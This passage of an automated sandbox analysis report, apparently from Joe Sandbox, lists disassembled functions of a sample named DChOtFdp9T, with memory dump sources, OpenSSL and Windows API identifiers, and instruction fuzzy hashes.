                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0017522B0DB5289E7149B41A560ABDA721FB45FC4F485231EE7DD7BCEDE6CE1018B00
                                                                                                                                                                                                                            Function 00007FFDFF27DD8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_printf$O_indent
                                                                                                                                                                                                                            • String ID: %s (%d)$unexpected value
                                                                                                                                                                                                                            • API String ID: 1715996925-1289549259
                                                                                                                                                                                                                            • Opcode ID: a6bac1a98305fa3a2e5cb2417fc7e388382efdd2d9e12223632487b3bb5db7b3
                                                                                                                                                                                                                            • Instruction ID: 667c817ea2c96c26c0f57f962eedfcf46a58b00bd6a552650b02aa96bc034c06
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6bac1a98305fa3a2e5cb2417fc7e388382efdd2d9e12223632487b3bb5db7b3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF01932B0D64245E7249B55A421EFC2351AB81B84F944732D9BDC66DDEE6CA541D204
                                                                                                                                                                                                                            Function 00007FFDFF241C7B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$ossl_statem_server_construct_message
                                                                                                                                                                                                                            • API String ID: 193678381-3648037868
                                                                                                                                                                                                                            • Opcode ID: be4aeb8b0d78eca14290d6c727017c12828a8eff6c2d62bbe9aa3af524bbc8d2
                                                                                                                                                                                                                            • Instruction ID: a227d6bac563a03979ed047a3711119a30b3f6266b09dfd866de06fe92640565
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be4aeb8b0d78eca14290d6c727017c12828a8eff6c2d62bbe9aa3af524bbc8d2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF05E61F0990286F7009764E8A2FFD23009F85754F948631EA3DC66DFEE2DE6428B00
                                                                                                                                                                                                                            Function 00007FF6029AB420 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                            • Opcode ID: 3de27d915358dce11b3db9e361fb48733d835174325f6c115816a4f7b36d23b8
                                                                                                                                                                                                                            • Instruction ID: 7b18981af93d470e8ca3ac1732c510d83026e223746c8fb49aa55d7768b86133
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3de27d915358dce11b3db9e361fb48733d835174325f6c115816a4f7b36d23b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D1BE22F08B8189E711CF6AD4502AC3BB1FB54B9CF244235DE5E97B9ADE78D516C340
                                                                                                                                                                                                                            Function 00007FF6029ABDE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABEFC
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABF87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                            • Opcode ID: 1bf50ddb4a58c396ccc2bedee5dde2c6094cd39be3831b58d3ecb0a391e97674
                                                                                                                                                                                                                            • Instruction ID: 0a939237cb53b981ec4db7f11c1aba64d76cec34c62a277ee3f7459a8acc7514
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bf50ddb4a58c396ccc2bedee5dde2c6094cd39be3831b58d3ecb0a391e97674
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9291A362F0875285FB519F6A94502BD7FA0FF54B8CF344139DE0E96A86DEB8D481C780
                                                                                                                                                                                                                            Function 00007FFDFABD1FB0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strncmp
                                                                                                                                                                                                                            • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                            • API String ID: 1114863663-87138338
                                                                                                                                                                                                                            • Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                            • Instruction ID: 29167db57b122d4baa3a49f1db5a29046f1110f140224ea52a2614c5241145eb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E61E872B1C68246E7689B15A820E7A7652FB84B94F848275EE7E477CDEF3CD501CB00
                                                                                                                                                                                                                            Function 00007FFDFF241EB5 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B_exCalc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1900010111-0
                                                                                                                                                                                                                            • Opcode ID: 7c5af11aac7cd86d91f28a3a58d4b334e0a54e00599c877ec4df84fa83074675
                                                                                                                                                                                                                            • Instruction ID: ba64cc12d7b1cf342113ffa9e2322f3de123b6281e77d0015ab0d2434ca92819
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c5af11aac7cd86d91f28a3a58d4b334e0a54e00599c877ec4df84fa83074675
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50317222719A8281FB549F25D4A0BAD3390EB88B88F584636DE6DCB7D9DF3CD441C700
                                                                                                                                                                                                                            Function 00007FF602992030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                            • Opcode ID: e42f8d3530da9c3dd641b58729eda5db52a5a8d2ed854a22cf7f5beb2a148ea9
                                                                                                                                                                                                                            • Instruction ID: 6146f5fdc2a04ff67025401e0033614987e9f93f0603353973ad171ddd3a1aee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e42f8d3530da9c3dd641b58729eda5db52a5a8d2ed854a22cf7f5beb2a148ea9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A111E921E0814246FA55976FE5442B91A51EF85BD4FA48030DE4987B8FCDBCD4D58200
                                                                                                                                                                                                                            Function 00007FFDFF282FA0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Calc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2662037904-0
                                                                                                                                                                                                                            • Opcode ID: 7a273ebb1a82c0c41e33c69bcc82d7d43031582966ed0bb36749a55edc93a2fa
                                                                                                                                                                                                                            • Instruction ID: 35691bff033f6357aef4fa9f78f4aa7ae1262bd5d030703392ee95428e8ca620
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a273ebb1a82c0c41e33c69bcc82d7d43031582966ed0bb36749a55edc93a2fa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1611A76270998241FB419B25D4717EA3390FB89B88F840132DE6DCB79ADE6CD2418740
                                                                                                                                                                                                                            Function 00007FFDFF241C80 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_find_typeO_get_data
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 280995463-0
                                                                                                                                                                                                                            • Opcode ID: 4e50a2f4a88a6d761d7ccd7a3bd18b37b0c9016f6bef0bab40c8506c6eab9574
                                                                                                                                                                                                                            • Instruction ID: 0871d30c4b2cb06c55de7d8b44a418386837a9b6ddc458b3c6d7aa315a058f8e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e50a2f4a88a6d761d7ccd7a3bd18b37b0c9016f6bef0bab40c8506c6eab9574
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E015221F1D69241FB48A612A521A7DAB90AF85FC4F484230EE7DCBBDFEE5CE5414700
                                                                                                                                                                                                                            Function 00007FFDFF241005 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_dupE_freeL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 417592659-0
                                                                                                                                                                                                                            • Opcode ID: 16b76ce0269332f82dbb777da5921929977a1e7509ba376f46e0c547e1790b72
                                                                                                                                                                                                                            • Instruction ID: 977acf098dea6e3dd5d5f34de3c365da21033f0960b2b10e8c6570032e89bbed
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16b76ce0269332f82dbb777da5921929977a1e7509ba376f46e0c547e1790b72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01012C25F0A64245FF999766B165BB953909F48BD8F4C0631EE3CCA7CEFE2CE8914600
                                                                                                                                                                                                                            Function 00007FFDFF241E3D Relevance: 6.0, APIs: 4, Instructions: 40timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: db2a8fc3af55ce99db508a7d0662d03d14f2565e6c8d38b916340992943ce863
                                                                                                                                                                                                                            • Instruction ID: bda7a5ca2c7c2eb85c00cddeb63c91b11bc1924d36c7fefa0433452c1ccc75cd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db2a8fc3af55ce99db508a7d0662d03d14f2565e6c8d38b916340992943ce863
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3111F22B24F46C9EB008B60E8656B833A4FB19758F440F35DA7DC67E8EF78D1588340
                                                                                                                                                                                                                            Function 00007FF60299C080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
                                                                                                                                                                                                                            • Instruction ID: 2e52023be74b661de9da9fea0a7cd0cfabb313305cf0ce80c5604d4f41072ec3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D118E32B14F028AEB00CF65E8542B837A4FB59B6CF240E35DA2D867A5DFBCD1948340
                                                                                                                                                                                                                            Function 00007FFDFABD2BEC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
